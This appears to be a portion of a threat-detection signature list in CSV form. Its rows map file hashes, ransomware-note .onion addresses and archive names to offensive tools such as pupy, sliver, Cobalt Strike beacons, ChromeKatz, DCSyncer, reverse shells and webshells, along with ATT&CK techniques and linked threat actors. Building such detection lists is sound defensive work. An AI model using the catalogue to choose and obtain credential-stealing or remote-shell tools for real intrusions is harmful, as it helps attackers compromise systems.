"*eb66eddca2e0c2a6b40ab6be4a159be5c81ee9f1dd3b7cc42df7c017ae06ee45*",".{0,1000}eb66eddca2e0c2a6b40ab6be4a159be5c81ee9f1dd3b7cc42df7c017ae06ee45.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#filehash","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","42552"
"*eb6a95c5c92ae3923ae07b80feac9e215f68eaff1289303063fa575a92c27967*",".{0,1000}eb6a95c5c92ae3923ae07b80feac9e215f68eaff1289303063fa575a92c27967.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","42553"
"*eb760ea670e63083e0fef40c12861c6459ebf28b86129c8d3fa200714b2a0b02*",".{0,1000}eb760ea670e63083e0fef40c12861c6459ebf28b86129c8d3fa200714b2a0b02.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#filehash","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","42557"
"*eb86b2983951110f0f06547f3a965f6f0ae9d07b452aa14d23265c73334e1df5*",".{0,1000}eb86b2983951110f0f06547f3a965f6f0ae9d07b452aa14d23265c73334e1df5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42558"
"*eb87d686b9a040238e563add68fb05c2776f52332c4798cae372638af3c7fca0*",".{0,1000}eb87d686b9a040238e563add68fb05c2776f52332c4798cae372638af3c7fca0.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","42559"
"*eb901b02b7f7173e62a962b9d5d66b52ed9b47fcb8061165a1b2bcf2a5e5504d*",".{0,1000}eb901b02b7f7173e62a962b9d5d66b52ed9b47fcb8061165a1b2bcf2a5e5504d.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","42563"
"*eb93d18ebddbcc79c037708558cbf1295b85a75230ba1690f07d287433d48fd1*",".{0,1000}eb93d18ebddbcc79c037708558cbf1295b85a75230ba1690f07d287433d48fd1.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","42566"
"*eb9c1a8804daed7c8ace37adc87ac66b52e7363666e5af7912bb17695df9b4f4*",".{0,1000}eb9c1a8804daed7c8ace37adc87ac66b52e7363666e5af7912bb17695df9b4f4.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","42568"
"*eb9da00ffbeda04154547d05a2c6ffb7131b75762b8239a8095b0915bf810e60*",".{0,1000}eb9da00ffbeda04154547d05a2c6ffb7131b75762b8239a8095b0915bf810e60.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42569"
"*eb9df7d669dcabf93689b82371cc913efa490d3912da2101c5f4660f9edbcf7f*",".{0,1000}eb9df7d669dcabf93689b82371cc913efa490d3912da2101c5f4660f9edbcf7f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42570"
"*eba551ef10f31815b3fcf90ed71df40aa0ed7e4aae4aca05eaef47efd4609e4c*",".{0,1000}eba551ef10f31815b3fcf90ed71df40aa0ed7e4aae4aca05eaef47efd4609e4c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42571"
"*eba7e3def98ff4fe742daf4b2caf56d74fb83b502fc035753646fd5fd115a402*",".{0,1000}eba7e3def98ff4fe742daf4b2caf56d74fb83b502fc035753646fd5fd115a402.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42572"
"*eba9447c8ef7248fd7f1a14a7ca34b66fc21f090dc6b30873c54acb418afe13d*",".{0,1000}eba9447c8ef7248fd7f1a14a7ca34b66fc21f090dc6b30873c54acb418afe13d.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","42573"
"*ebaa36db295f1c3a7d59e460ce6813221d0097f3c12ce26e818d4d4ac83c0919*",".{0,1000}ebaa36db295f1c3a7d59e460ce6813221d0097f3c12ce26e818d4d4ac83c0919.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","42574"
"*ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438*",".{0,1000}ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42575"
"*ebab9ec84e1edfc7799a553765e92babbbdbe685949c81ba040889a2f6cbee77*",".{0,1000}ebab9ec84e1edfc7799a553765e92babbbdbe685949c81ba040889a2f6cbee77.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42576"
"*ebac84e6e59f9bb6093f2aabef5c9568c27ab1f922d3124c9e8f9675de150059*",".{0,1000}ebac84e6e59f9bb6093f2aabef5c9568c27ab1f922d3124c9e8f9675de150059.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42577"
"*ebb285411e3ba9431b7c211c1e8ba97753699805f03663cbc367798b4db2c1fc*",".{0,1000}ebb285411e3ba9431b7c211c1e8ba97753699805f03663cbc367798b4db2c1fc.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","42579"
"*ebb3a940c6d104730532897e9e753cbeead3ad059186e15dab4f403d6ff0acf5*",".{0,1000}ebb3a940c6d104730532897e9e753cbeead3ad059186e15dab4f403d6ff0acf5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42580"
"*ebbfc954a86165453676f0671b5b4d24d58425c65245511ca04dbcd799934e77*",".{0,1000}ebbfc954a86165453676f0671b5b4d24d58425c65245511ca04dbcd799934e77.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42581"
"*ebc3a8b952bb617b89cf6f807c4e60e23978608dcaa75e381406bd85de984481*",".{0,1000}ebc3a8b952bb617b89cf6f807c4e60e23978608dcaa75e381406bd85de984481.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","42583"
"*ebc544aa7679a2d04acf28f4df70bdfe827962993447321ca71e408dd4e10414*",".{0,1000}ebc544aa7679a2d04acf28f4df70bdfe827962993447321ca71e408dd4e10414.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","42584"
"*ebd36ece57ad0fefe730705480742620c4d189aa6a3d3a00d46504d1bd9741c9*",".{0,1000}ebd36ece57ad0fefe730705480742620c4d189aa6a3d3a00d46504d1bd9741c9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42585"
"*ebd8cbb85e4108ec6a13c3b25c839ac3d0ad4c0a07bf76e3f882daaf63e09fc9*",".{0,1000}ebd8cbb85e4108ec6a13c3b25c839ac3d0ad4c0a07bf76e3f882daaf63e09fc9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42586"
"*ebdac49d15f37cc60cb5e755b10743512ececf134126e0ac4a024cb1149ae76f*",".{0,1000}ebdac49d15f37cc60cb5e755b10743512ececf134126e0ac4a024cb1149ae76f.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#filehash","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","42587"
"*ebde1952b0cd01f7fd6534da9cd878040cc6b21c992be602f83ade3bfe6b404d*",".{0,1000}ebde1952b0cd01f7fd6534da9cd878040cc6b21c992be602f83ade3bfe6b404d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42588"
"*ebdf64076861a73d92416c6203d50dd25f4c991372f7d47e7146e29ab41a6892*",".{0,1000}ebdf64076861a73d92416c6203d50dd25f4c991372f7d47e7146e29ab41a6892.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","#filehash","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","42589"
"*ebe4b211d5a78a04727f24438102b25abc60f10ac6f222a05fbdaf119c23707e*",".{0,1000}ebe4b211d5a78a04727f24438102b25abc60f10ac6f222a05fbdaf119c23707e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42590"
"*ebe64c00a953cf3b93b69b2b1b275b9bc97fb70a85713bfc1df6fb1d15e4c938*",".{0,1000}ebe64c00a953cf3b93b69b2b1b275b9bc97fb70a85713bfc1df6fb1d15e4c938.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","42591"
"*ebe927a4481119e426d73ba93236206922902cb1a5eb34a85be60294c81e4b0d*",".{0,1000}ebe927a4481119e426d73ba93236206922902cb1a5eb34a85be60294c81e4b0d.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","42592"
"*ebef8a0206bb0550926511265edc977c0a75de6dd8a03be4e228cf708ac64c24*",".{0,1000}ebef8a0206bb0550926511265edc977c0a75de6dd8a03be4e228cf708ac64c24.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","42594"
"*ebf94bb78b8deae210b897fd7c7da691e9fcfd215e641f28c5a0056a69e63aa6*",".{0,1000}ebf94bb78b8deae210b897fd7c7da691e9fcfd215e641f28c5a0056a69e63aa6.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","42595"
"*ebf98b345bcc6ffd230e9ff5554fa32c998f0801ed0b1d4f2bd3c2e5bbf16a8d*",".{0,1000}ebf98b345bcc6ffd230e9ff5554fa32c998f0801ed0b1d4f2bd3c2e5bbf16a8d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42596"
"*ebf9bf76500715fe20c475140d200e76b51c400406683827eabb2ab70f9f986f*",".{0,1000}ebf9bf76500715fe20c475140d200e76b51c400406683827eabb2ab70f9f986f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42597"
"*ebfb867fcb1efed0a7e4d9bb43b5b6d22f8744446bb29bcaf76aa6a48f36bf9c*",".{0,1000}ebfb867fcb1efed0a7e4d9bb43b5b6d22f8744446bb29bcaf76aa6a48f36bf9c.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","42598"
"*ebfbe1788f944eda7614d311a9b6ca197a6d595910bf19e8f8dcfe7d92e77215*",".{0,1000}ebfbe1788f944eda7614d311a9b6ca197a6d595910bf19e8f8dcfe7d92e77215.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42599"
"*ebfebca063aa056d7ffd8767c7c82d66c0c1a4339eb504a8e0636280dc5b839f*",".{0,1000}ebfebca063aa056d7ffd8767c7c82d66c0c1a4339eb504a8e0636280dc5b839f.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#filehash","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","42601"
"*ebffe9aadf0e6b25df7573ca04de5b12d79ad0103d1fd936e333660b4359006c*",".{0,1000}ebffe9aadf0e6b25df7573ca04de5b12d79ad0103d1fd936e333660b4359006c.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","42602"
"*ebfidpplhabeedpnhjnobghokpiioolj*",".{0,1000}ebfidpplhabeedpnhjnobghokpiioolj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","42603"
"*ebljej7okwfnx5hdfikqqt2uqehihqv3yns3ziij5clqpklwb3i2cxad.onion*",".{0,1000}ebljej7okwfnx5hdfikqqt2uqehihqv3yns3ziij5clqpklwb3i2cxad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","42604"
"*Ebowla-master.zip*",".{0,1000}Ebowla\-master\.zip.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","42605"
"*ebwexiymbsib4rmw.onion*",".{0,1000}ebwexiymbsib4rmw\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","42606"
"*ec002016f00ae6f232c1d5e166e5a01e48d3b25302e96a69d87fbf3fc8f05e50*",".{0,1000}ec002016f00ae6f232c1d5e166e5a01e48d3b25302e96a69d87fbf3fc8f05e50.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","42607"
"*ec0c4d2a63a8eacbd2bc8e93f00b4a0402b3f98a72c9e4218e0d6d7a8e438da6*",".{0,1000}ec0c4d2a63a8eacbd2bc8e93f00b4a0402b3f98a72c9e4218e0d6d7a8e438da6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42609"
"*ec19621c142ea507d319f064c4dc19ffa3026c4e084920f0486e13a34d877d8b*",".{0,1000}ec19621c142ea507d319f064c4dc19ffa3026c4e084920f0486e13a34d877d8b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42610"
"*ec1c4cf05df4d398a2808a094ceabc9c75ec5c59e51d5bc0c5814dd140a45df7*",".{0,1000}ec1c4cf05df4d398a2808a094ceabc9c75ec5c59e51d5bc0c5814dd140a45df7.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42611"
"*ec1e39774b339fa1939d8b970961041349ecf364ca612d376a42744db8132223*",".{0,1000}ec1e39774b339fa1939d8b970961041349ecf364ca612d376a42744db8132223.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42612"
